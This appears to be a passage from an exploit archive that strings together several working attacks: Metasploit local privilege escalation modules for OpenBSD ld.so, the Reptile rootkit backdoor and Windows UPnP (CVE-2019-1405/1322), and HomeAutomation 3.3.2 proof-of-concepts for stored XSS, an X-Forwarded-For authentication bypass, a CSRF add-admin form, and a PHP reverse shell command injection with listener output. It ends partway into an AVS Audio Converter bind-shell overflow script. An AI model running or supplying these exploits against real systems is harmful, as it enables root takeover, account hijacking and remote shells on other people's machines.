== '0') end def libutil_name return unless command_exists? 'readelf' cmd_exec('readelf -a /usr/sbin/pwd_mkdb').to_s.scan(/\[(libutil\.so\.[\d\.]+)\]/).flatten.first end def check patches = cmd_exec('syspatch -l').to_s patch = '013_ldso' if patches.include? patch vprint_error "Patch #{patch} has been installed. Target is not vulnerable." return CheckCode::Safe end vprint_good "Patch #{patch} is not present" unless command_exists? 'cc' vprint_error 'cc is not installed' return CheckCode::Safe end print_good 'cc is installed' CheckCode::Detected end def exploit unless check == CheckCode::Detected unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Qualys set-uid shared object from https://www.openwall.com/lists/oss-security/2019/12/11/9 lib_data = <<-EOF #include <paths.h> #include <unistd.h> static void __attribute__ ((constructor)) _init (void) { if (setuid(0) != 0) _exit(__LINE__); if (setgid(0) != 0) _exit(__LINE__); char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL }; execve(argv[0], argv, NULL); _exit(__LINE__); } EOF libs = [] lib = libutil_name if lib libs << lib print_good "Found libutil.so name: #{lib}" else libs << 'libutil.so.12.1' libs << 'libutil.so.13.1' print_warning "Could not determine libutil.so name. Using: #{libs.join(', ')}" end lib_src_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}.c" upload lib_src_path, lib_data libs.each do |lib_name| lib_path = "#{base_dir}/#{lib_name}" print_status "Compiling #{lib_path} ..." output = cmd_exec "cc -fpic -shared -s -o #{lib_path} #{lib_src_path} -Wall" register_file_for_cleanup lib_path unless output.blank? print_error output fail_with Failure::Unknown, "#{lib_path}.c failed to compile" end end # Qualys exploit from https://www.openwall.com/lists/oss-security/2019/12/11/9 exploit_data = <<-EOF #include <string.h> #include <sys/param.h> #include <sys/resource.h> #include <unistd.h> int main(int argc, char * const * argv) { #define LLP "LD_LIBRARY_PATH=." static char llp[ARG_MAX - 128]; memset(llp, ':', sizeof(llp)-1); memcpy(llp, LLP, sizeof(LLP)-1); char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL }; #define DATA (ARG_MAX * sizeof(char *)) const struct rlimit data = { DATA, DATA }; if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__); if (argc <= 1) _exit(__LINE__); argv += 1; execve(argv[0], argv, envp); _exit(__LINE__); } EOF exploit_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}" upload "#{exploit_path}.c", exploit_data print_status "Compiling #{exploit_path} ..." output = cmd_exec "cc -s #{exploit_path}.c -o #{exploit_path} -Wall" register_file_for_cleanup exploit_path unless output.blank? print_error output fail_with Failure::Unknown, "#{exploit_path}.c failed to compile" end payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}" upload payload_path, "#!/bin/sh\n#{payload.encoded}\n" chmod payload_path print_status 'Launching exploit...' output = cmd_exec("cd #{base_dir};echo '#{payload_path}&exit'|#{exploit_path} #{chpass_path}") output.each_line { |line| vprint_status line.chomp } end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation', 'Description' => %q{ This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64). }, 'License' => MSF_LICENSE, 'Author' => [ 'f0rb1dd3n', # Reptile 'bcoles' # Metasploit ], 'DisclosureDate' => '2018-10-29', # Reptile first stable release 'References' => [ ['URL', 'https://github.com/f0rb1dd3n/Reptile'], ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage'] ], 'Platform' => ['linux'], 'Arch' => [ARCH_X86, ARCH_X64], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [['Auto', {}]], 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'DefaultTarget' => 0)) register_options [ OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd']) ] register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def reptile_cmd_path datastore['REPTILE_CMD_PATH'] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data chmod path end def check unless executable? reptile_cmd_path vprint_error "#{reptile_cmd_path} is not executable" return CheckCode::Safe end vprint_good "#{reptile_cmd_path} is executable" res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip vprint_status "Output: #{res}" if res.include?('You have no power here!') vprint_error 'Reptile kernel module is not loaded' return CheckCode::Safe end unless res.include?('root') vprint_error 'Reptile is not installed' return CheckCode::Safe end vprint_good 'Reptile is installed and loaded' CheckCode::Vulnerable end def exploit unless check == CheckCode::Vulnerable unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end payload_name = ".#{rand_text_alphanumeric 8..12}" payload_path = "#{base_dir}/#{payload_name}" upload_and_chmodx payload_path, generate_payload_exe print_status 'Executing payload...' res = cmd_exec "echo '#{payload_path}&' | #{reptile_cmd_path} root & echo " vprint_line res end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/windows/priv' require 'msf/core/post/windows/registry' require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability', 'Description' => %q( This exploit uses two vulnerabilities to execute a command as an elevated user. The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to NT AUTHORITY\LOCAL SERVICE The second (CVE-2019-1322) leverages the Update Orchestrator Service to elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM. ), 'License' => MSF_LICENSE, 'Author' => [ 'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/) 'hoangprod', # PoC 'bwatters-r7' # msf module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ ['Windows x64', { 'Arch' => ARCH_X64 }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 12 2019', 'References' => [ ['CVE', '2019-1322'], ['CVE', '2019-1405'], ['EDB', '47684'], ['URL', 'https://github.com/apt69/COMahawk'], ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'], ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1'] ], 'DefaultOptions' => { 'DisablePayloadHandler' => false } )) register_options([ OptString.new('EXPLOIT_NAME', [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), OptString.new('WRITABLE_DIR', [false, 'Path to write binaries (%TEMP% by default).', nil]), OptInt.new('EXPLOIT_TIMEOUT', [true, 'The number of seconds to wait for exploit to finish running', 60]), OptInt.new('EXECUTE_DELAY', [true, 'The number of seconds to delay between file upload and exploit launch', 3]) ]) end def exploit exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14) payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14) exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe') payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe') temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP') payload_path = "#{temp_path}\\#{payload_name}" exploit_path = "#{temp_path}\\#{exploit_name}" payload_exe = generate_payload_exe # Check target vprint_status("Checking Target") validate_active_host validate_target fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path) # Upload Exploit vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}") ensure_clean_destination(exploit_path) exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe') write_file(exploit_path, exploit_bin) print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}") # Upload Payload vprint_status("Uploading Payload") ensure_clean_destination(payload_path) write_file(payload_path, payload_exe) print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}") print_warning("This exploit requires manual cleanup of the payload #{payload_path}") # Run Exploit vprint_status("Running Exploit") print_status("It may take a moment after the session is established for the exploit to exit safely.") begin cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60) rescue Rex::TimeoutError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") print_error("Caught timeout. Exploit may be taking longer or it may have failed.") end vprint_status("Cleaning up #{exploit_path}") ensure_clean_destination(exploit_path) end def validate_active_host begin print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") raise Msf::Exploit::Failed, 'Could not connect to session' end end def validate_target if sysinfo['Architecture'] == ARCH_X86 fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') end sysinfo_value = sysinfo['OS'] build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i vprint_status("Build Number = #{build_num}") unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362) fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362') end end def ensure_clean_destination(path) return unless file?(path) print_status("#{path} already exists on the target. Deleting...") begin file_rm(path) print_status("Deleted #{path}") rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") print_error("Unable to delete #{path}") end end end

# Exploit: HomeAutomation 3.3.2 - Persistent Cross-Site Scripting # Date: 2019-12-30 # Author: LiquidWorm # Vendor: Tom Rosenback and Daniel Malmgren # Product web page: http://karpero.mine.nu/ha/ # Affected version: 3.3.2 # Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips # Advisory ID: ZSL-2019-5556 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php # HomeAutomation v3.3.2 Stored and Reflected XSS Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Summary: HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house. Desc: HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips Apache/2.4.29 (Ubuntu) PHP/7.4.0RC4 PHP/7.3.11 PHP 7.2.24-0ubuntu0.18.04.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5556 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php 06.11.2019 -- Reflected XSS: -------------- https://192.168.2.113/?page=houseplan&autologin=1&msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ== Stored XSS: ----------- POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 998 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 Sec-Fetch-User: ?1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&action=edit&id=-1 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="id" -1 ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="action" save ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="name" XSS ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="comment" "><script>confirm(document.cookie)</script> ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="icon_on"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="scenario" 1 ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="devices[0]" 1 ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="statuses[0]" 1 ------WebKitFormBoundaryq4LcgA7mbqElCW4q Content-Disposition: form-data; name="save" Save ------WebKitFormBoundaryq4LcgA7mbqElCW4q--

# Exploit: HomeAutomation 3.3.2 - Authentication Bypass # Date: 2019-12-30 # Author: LiquidWorm # Vendor: Tom Rosenback and Daniel Malmgren # Product web page: http://karpero.mine.nu/ha/ # Affected version: 3.3.2 # Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips # Advisory ID: ZSL-2019-5557 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php HomeAutomation v3.3.2 Authentication Bypass Exploit Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Summary: HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house. Desc: The application suffers from an authentication bypass vulnerability when spoofing client IP address using the X-Forwarded-For header with the local (loopback) IP address value allowing remote control of the smart home solution. =============================================================================== /modules/login/login.module.php: -------------------------------- 19: if(!defined("HomeAutomationIncluded")) { die("HomeAutomation: Direct access not premitted"); } 20: 21: if($_SESSION[CFG_SESSION_KEY]["userlevel"] < 1 && $action == "default" && isIpLocal() && getFormVariable("autologin", "") == "") 22: { 23: // if user is not logged in and action is default, user is visiting locally and autologin is NOT set, allow autologin. 24: $action = "login"; 25: } 26: 27: ?> =============================================================================== /functions.php: --------------- 733: function isIpLocal() { 734: 735: if(substr(getIpAddress(), 0, 4) == "127.") { 736: return true; 737: } 738: 739: $isIpLocal = false; 740: 741: $localip = $_SESSION[CFG_SESSION_KEY]["settings"]["localip"]; 742: 743: $localnets = explode(";", $localip); 744: foreach($localnets as $localnet) { 745: list($localnet, $localmask) = explode("/", $localnet); 746: if($localmask == "") { 747: $localmask = 32; 748: } 749: if($localmask == "" || $localmask > 32 || $localmask < 0) { 750: $localmask = 32; 751: } 752: 753: // $mask = $localmask; 754: 755: $localnet = ip2long($localnet); 756: $localmask = ~((1 << (32-$localmask)) - 1); 757: $remoteip = ip2long(getIpAddress()); 758: $maskedip = $remoteip & $localmask; 759: $maskednet = $localnet & $localmask; 760: 761: // echo "<br />localnet:"; 762: // printf('%1$32b', $localnet); 763: 764: // echo "<br />localmask: (dec: ".$mask.")"; 765: // printf('%1$32b', $localmask); 766: 767: // echo "<br />remoteip:"; 768: // printf('%1$32b', $remoteip); 769: 770: // echo "<br />maskedip:"; 771: // printf('%1$32b', $maskedip); 772: 773: // echo "<br />maskednet:"; 774: // printf('%1$32b', $maskednet); 775: 776: if($maskedip == $maskednet) { 777: // echo "<br />maskedip == maskednet"; 778: $isIpLocal = true; 779: break; 780: } 781: } 782: // $isIpLocal = false; 783: return $isIpLocal; 784: } 785: 786: function getIpAddress() { 787: return isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; 788: } =============================================================================== Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips Apache/2.4.29 (Ubuntu) PHP/7.4.0RC4 PHP/7.3.11 PHP 7.2.24-0ubuntu0.18.04.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5557 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php 06.11.2019 -- PoC auth bypass and arbitrary cookie setup grepping auth'd content view: ------------------------------------------------------------------------ root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -H "X-Forwarded-For: 127.31.33.7" -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros * Trying 192.168.2.113... * Connected to 192.168.2.113 (192.168.2.113) port 443 (#0) * found 173 certificates in /etc/ssl/certs/ca-certificates.crt * found 696 certificates in /etc/ssl/certs * ALPN, offering h2 * ALPN, offering http/1.1 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256 * server certificate verification SKIPPED * server certificate status verification SKIPPED * common name: n28.nux.se (does not match '192.168.2.113') * server certificate expiration date OK * server certificate activation date OK * certificate public key: RSA * certificate version: #3 * subject: CN=n28.nux.se * start date: Mon, 21 Oct 2019 12:18:27 GMT * expire date: Sun, 19 Jan 2020 12:18:27 GMT * issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3 * compression: NULL * ALPN, server accepted to use http/1.1 > GET /index.php HTTP/1.1 > Host: 192.168.2.113 > User-Agent: ZSL/0.2 (SpoofDetect 1.0) > Accept: */* > Cookie: PHPSESSID=11111111110000000000666666 > X-Forwarded-For: 127.31.33.7 > < HTTP/1.1 303 See Other < Date: Wed, 20 Nov 2019 01:06:16 GMT < Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips < X-Powered-By: PHP/7.3.11 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < Strict-Transport-Security: max-age=63072000; includeSubdomains < X-Frame-Options: DENY < X-Content-Type-Options: nosniff < Location: ./index.php?page=houseplan < Content-Length: 0 < Content-Type: text/html; charset=UTF-8 < * Connection #0 to host 192.168.2.113 left intact * Issue another request to this URL: 'https://192.168.2.113/index.php?page=houseplan' * Found bundle for host 192.168.2.113: 0x55c160ef7c40 [can pipeline] * Re-using existing connection! (#0) with host 192.168.2.113 * Connected to 192.168.2.113 (192.168.2.113) port 443 (#0) > GET /index.php?page=houseplan HTTP/1.1 > Host: 192.168.2.113 > User-Agent: ZSL/0.2 (SpoofDetect 1.0) > Accept: */* > Cookie: PHPSESSID=11111111110000000000666666 > X-Forwarded-For: 127.31.33.7 > < HTTP/1.1 200 OK < Date: Wed, 20 Nov 2019 01:06:16 GMT < Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips < X-Powered-By: PHP/7.3.11 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < Strict-Transport-Security: max-age=63072000; includeSubdomains < X-Frame-Options: DENY < X-Content-Type-Options: nosniff < Transfer-Encoding: chunked < Content-Type: text/html; charset=UTF-8 < { [6 bytes data] * </li><li>| <a href="./index.php?page=macros">Macros</a> Connection #0 to host 192.168.2.113 left intact root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros * Trying 192.168.2.113... * Connected to 192.168.2.113 (192.168.2.113) port 443 (#0) * found 173 certificates in /etc/ssl/certs/ca-certificates.crt * found 696 certificates in /etc/ssl/certs * ALPN, offering h2 * ALPN, offering http/1.1 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256 * server certificate verification SKIPPED * server certificate status verification SKIPPED * common name: n28.nux.se (does not match '192.168.2.113') * server certificate expiration date OK * server certificate activation date OK * certificate public key: RSA * certificate version: #3 * subject: CN=n28.nux.se * start date: Mon, 21 Oct 2019 12:18:27 GMT * expire date: Sun, 19 Jan 2020 12:18:27 GMT * issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3 * compression: NULL * ALPN, server accepted to use http/1.1 > GET /index.php HTTP/1.1 > Host: 192.168.2.113 > User-Agent: ZSL/0.2 (SpoofDetect 1.0) > Accept: */* > Cookie: PHPSESSID=11111111110000000000666666 > < HTTP/1.1 200 OK < Date: Wed, 20 Nov 2019 01:06:25 GMT < Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips < X-Powered-By: PHP/7.3.11 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < Strict-Transport-Security: max-age=63072000; includeSubdomains < X-Frame-Options: DENY < X-Content-Type-Options: nosniff < Transfer-Encoding: chunked < Content-Type: text/html; charset=UTF-8 < { [6 bytes data] </li><li>| <a href="./index.php?page=macros">Macros</a> * Connection #0 to host 192.168.2.113 left intact root@kali:~/homeautomation# PoC auth bypass retrieving valid Cookie: ----------------------------------------- root@kali:~/homeautomation# $(curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/?page=houseplan -L -H "X-Forwarded-For: 127.1.1.1" --cookie-jar cookies.txt -o /dev/null) ; echo -ne "Your cookie: " ;tail -c -27 cookies.txt Your cookie: k4dic6crpr4d4u71tr13gvtmsv

# Exploit: HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin) # Date: 2019-12-30 # Author: LiquidWorm # Vendor: Tom Rosenback and Daniel Malmgren # Product web page: http://karpero.mine.nu/ha/ # Affected version: 3.3.2 # Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips # Advisory ID: ZSL-2019-5558 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php HomeAutomation v3.3.2 CSRF Add Admin Exploit Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Summary: HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips Apache/2.4.29 (Ubuntu) PHP/7.4.0RC4 PHP/7.3.11 PHP 7.2.24-0ubuntu0.18.04.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5558 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php 06.11.2019 -- <html> <body> <form action="http://localhost/homeautomation_v3_3_2/?page=conf-usercontrol" method="POST"> <input type="hidden" name="id" value="-1" /> <input type="hidden" name="action" value="save" /> <input type="hidden" name="editable" value="2" /> <input type="hidden" name="username" value="testingus" /> <input type="hidden" name="password" value="123456" /> <input type="hidden" name="firstname" value="Tester" /> <input type="hidden" name="lastname" value="Testovski" /> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="userlevel" value="3" /> <input type="hidden" name="save" value="Save" /> <input type="submit" value="Addmoi" /> </form> </body> </html>

# Exploit: HomeAutomation 3.3.2 - Remote Code Execution # Date: 2019-12-30 # Author: LiquidWorm # Vendor: Tom Rosenback and Daniel Malmgren # Product web page: http://karpero.mine.nu/ha/ # Affected version: 3.3.2 # Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips # Advisory ID: ZSL-2019-5560 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php HomeAutomation v3.3.2 CSRF Remote Command Execution (PHP Reverse Shell) PoC Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Summary: HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house. Desc: The application suffers from an authenticated OS command execution vulnerability using custom command v0.1 plugin. This can be exploited with CSRF vulnerability to execute arbitrary shell commands as the web user via the 'set_command_on' and 'set_command_off' POST parameters in '/system/systemplugins/customcommand/customcommand.plugin.php' by using an unsanitized PHP exec() function. =============================================================================== /system/systemplugins/customcommand/customcommand.plugin.php: ------------------------------------------------------------- 77: function toggleDevices($devicesToToggle, $statuses) { 78: $output = array(); 79: $command = ""; 80: 81: foreach($devicesToToggle as $device) 82: { 83: $status = $statuses[$device["id"]]; 84: if($status == 0) { 85: $command = $this->getSettings("command_off"); 86: } else { 87: $command = $this->getSettings("command_on"); 88: } 89: 90: if(!empty($command)) { 91: $command = replaceCustomStrings($command, $device, $statuses[$device["id"]]); 92: 93: exec($command, $output); 94: 95: SaveLog("Command: ".$command."\nOutput:\n".parseExecOutputToString($output)); 96: } 97: } 98: 99: return ""; 100: } =============================================================================== Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips Apache/2.4.29 (Ubuntu) PHP/7.4.0RC4 PHP/7.3.11 PHP 7.2.24-0ubuntu0.18.04.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5560 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php 06.11.2019 -- POST /homeautomation_v3_3_2/?page=conf-systemplugins HTTP/1.1 plugin=customcommand&action=savesettings&set_command_on=php+-r+%27%24sock%3Dfsockopen%28%22127.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&set_command_off=&savesettings=Save - lqwrm@metalgear:/$ nc -lvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from localhost 40724 received! /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ pwd /var/www/html/homeautomation_v3_3_2 $ exit lqwrm@metalgear:/$

# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC) # Date: December 2019-12-28 # Exploit Author: boku # Original DoS: https://www.exploit-db.com/exploits/47788 # Original DoS Author: ZwX # Software Vendor: http://www.avs4you.com/ # Software Link: http://www.avs4you.com/avs-audio-converter.aspx # Version: 9.1.2.600 # Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363 # Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601 #!/usr/bin/python # Recreate: # 1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux. # 2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy. # 3) Install & Open AVS Audio Converter 9.1.2.600. # 4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window. # 5) Paste the copied payload from the 'bind9999.txt' file into the textbox. # 6) Click the 'Browse...' button; to the right of the textbox. # - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces. # Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet File = 'bind9999.txt' try: # 0x00400000 [AVSAudioConverter.exe] # 9.1.2.600 (C:\Program Files (x86)\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe) # - The only module that has SafeSEH disabled. # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | # 0x00400000 | 